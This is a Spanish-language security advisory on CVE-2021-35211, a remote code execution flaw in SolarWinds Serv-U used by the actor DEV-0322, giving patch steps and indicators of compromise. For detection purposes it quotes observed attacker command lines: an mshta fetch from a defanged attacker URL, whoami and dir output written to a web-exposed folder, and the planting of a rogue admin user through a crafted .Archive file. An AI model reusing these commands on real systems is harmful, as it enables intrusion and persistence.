Fecha de publicación: Mar, 13/07/2021 - 15:21

Descripción

La vulnerabilidad identificada como CVE-2021-35211, fue encontrada por el centro de Inteligencia de Amenazas de Microsoft (MSTIC) y los equipos de Investigación de Seguridad Ofensiva de Microsoft, en los productos Serv-U de SolarWinds. La explotación de esta vulnerabilidad permitirá a los atacantes realizar la ejecución remota de código e instalar programas y cambiar datos en los sistemas afectados.

"Microsoft ha proporcionado evidencia de un impacto limitado y específico en el cliente, aunque SolarWinds no tiene actualmente una estimación de cuántos clientes pueden verse afectados directamente por la vulnerabilidad" compartió la compañía en un aviso publicado el pasado viernes, señalando también que "desconoce la identidad de clientes potencialmente afectados".

La vulnerabilidad encontrada por Microsoft en el último Serv-U 15.2.3 HF1 (que contiene a los productos Serv-U Managed File Transfer y Serv-U Secure FTP) lanzado en mayo de 2021 también afecta a todas las versiones anteriores.

Productos afectados

Serv-U 15.2.3 HF1 y todas las versiones anteriores de Serv-U

Solución

El día viernes 9 de julio, Solar Winds solucionó el problema de seguridad en la versión de revisión de Serv-U 15.2.3 HF2, la cual piden a los administradores instalen esta solución, según corresponda mediante las siguientes versiones:

  • Actualizar a Serv-U 15.2.3 HF2 para Serv-U 15.2.3 HF1
  • Actualizar a Serv-U 15.2.3 HF1, luego aplicar Serv-U 15.2.3 HF2 para Servi-U 15.2.3.
  • Actualizar a Serv-U 15.2.3, luego aplique Serv-U 15.2.3 HF1, luego aplique Serv-U 15.2.3 HF2 para todas las versiones de Serv-U anteriores a la 15.2.3.

Todas estas actualizaciones se encuentran en su portal de clientes de SolarWinds.

Indicadores de compromiso

SolarWinds ha compartido indicadores de compromiso e insta a los administradores a estar atentos a conexiones desde las siguiente IP’s:

  • 98 [.] 176 [.] 196 [.] 89
  • 68 [.] 235 [.] 178 [.] 32
  • 208 [.] 113 [.] 35 [.] 58
  • 144 [.] 34 [.] 179 [.] 162
  • 97 [.] 77 [.] 97 [.] 58
  • hxxp: // 144 [.] 34 [.] 179 [.] 162 / a

Los signos adicionales de compromiso potencial incluyen:

  • Creación de archivos .txt en el directorio Client \ Common \ para la instalación de serv-U.
  • Serv-U.exe genera procesos secundarios que no forman parte de las operaciones normales. Se sugiere buscar:
    • mshta.exe
    • powershell.exe
    • cmd.exe (o con host.exe luego genera cmd.exe) con cualquiera de las siguientes líneas de comandos:
      • whoami
      • dir
      • ./Client/Common
      • .\Client\Common
      • type [a file path] > “C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\[file name].Archive”
      • Cualquier proceso con la línea de comando: C:\Windows\Temp\
    • La adición de cualquier usuario global no reconocido a Serv-U. Que se lo  puede encontrar en la pestaña de Usuarios de la Consola de administración de Serv-U, también, se puede comprobar buscando archivos creados reciente mente en C: \ ProgramData \ RhinoSoft \ Serv-U \ Users \ Global User, que almacena información de usuarios globales.

MSTIC informó de procesos anómalos generados por Serv-U., detectado desde el día 0 por Microsoft 365 Defender, algunos ejemplos de los procesos maliciosos generados por Serv-U. exe incluyen:

  • C: \ Windows \ System32 \ mshta.exe http: // 144 [.] 34 [.] 179 [.] 162 /a (defanged)
  • cmd.exe / c whoami> "./Client/Common/redacted.txt"
  • cmd.exe / c dir> ". \ Client \ Common \ redacted.txt"
  • cmd.exe / c “” C: \ Windows \ Temp \ Serv-U.bat ””
  • powershell.exe C: \ Windows \ Temp \ Serv-U.bat
  • cmd.exe / c escriba \\ redacted \ redacted.Archive> "C: \ ProgramData \ RhinoSoft \ Serv-U \ Users \ Global Users \ redacted.Archive"

Se observo que DEV-0322 envía sus comandos cmd.exe a archivos en la carpeta Serv-U\Cliente\Common\, para poder acceder desde Internet de forma predeterminada, para que los atacantes puedan recuperar los resultados de los comandos. También genera un nuevo usuario global a Serv-U, agregándose como administrador de Serv-U, al crear manualmente un archivo .Archive diseñado en Global Users directory. Toda la información del usuario de Serv-U se almacena en este archivo.

Cuando el atacante compromete con éxito el proceso de Serv-U, genera una excepción y se registra en un archivo de registro de Serv-U, DebugSocketLog.txt.

Microsoft detecto por primera vez los ataques de DEV-0322 al analizar la telemetría de Microsoft 365 Defender durante una investigación de rutina. Microsoft también proporciono una guía de detección para permitir a los administradores verificar si hay indicadores de compromiso dentro de su infraestructura.

“Los clientes deben revisar el archivo de registro Serv-U DebugSocketLog.txt en busca de mensajes de excepción con la línea a continuación. A C0000005; la excepción CSUSSHSocket :: ProcessReceive puede indicar que se intentó un exploit, pero también puede aparecer por razones no relacionadas. De cualquier manera, si se encuentra la excepción los clientes deben revisar cuidadosamente sus registros en busca de comportamientos e indicadores de compromiso” señalo Microsoft.

EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive(); Type: 30; puchPayLoad = 0x03e909f6; nPacketLength = 76; nBytesReceived = 80; nBytesUncompressed = 156; uchPaddingLength = 5

La compañía también enfatizo que la vulnerabilidad "no está relacionada en absoluto con el ataque a la cadena de suministro SUNBURST" y que no afecta a otros productos, en particular a la plataforma Orion.

Identificador CVE

CVE-2021-35211 una explotación exitosa permite a los atacantes realizar ejecución remota de código e instalar programas, cambiar usuarios globales y registrar los datos de administración de Serv-U. El martes 13 de julio, Microsoft revelo que el ataque fue obra de un actor de amenazas chino apodado “DEV-0322”, el MSTIC ha observado que el grupo DEV-0322 apunta sus ataques a entidades del Sector de Base Industrial de Defensa de EE.UU. y empresas de software.

Referencias

Aviso de seguridad Solarwinds

Actor de amenaza descubierto por Microsoft

Información de explotación activa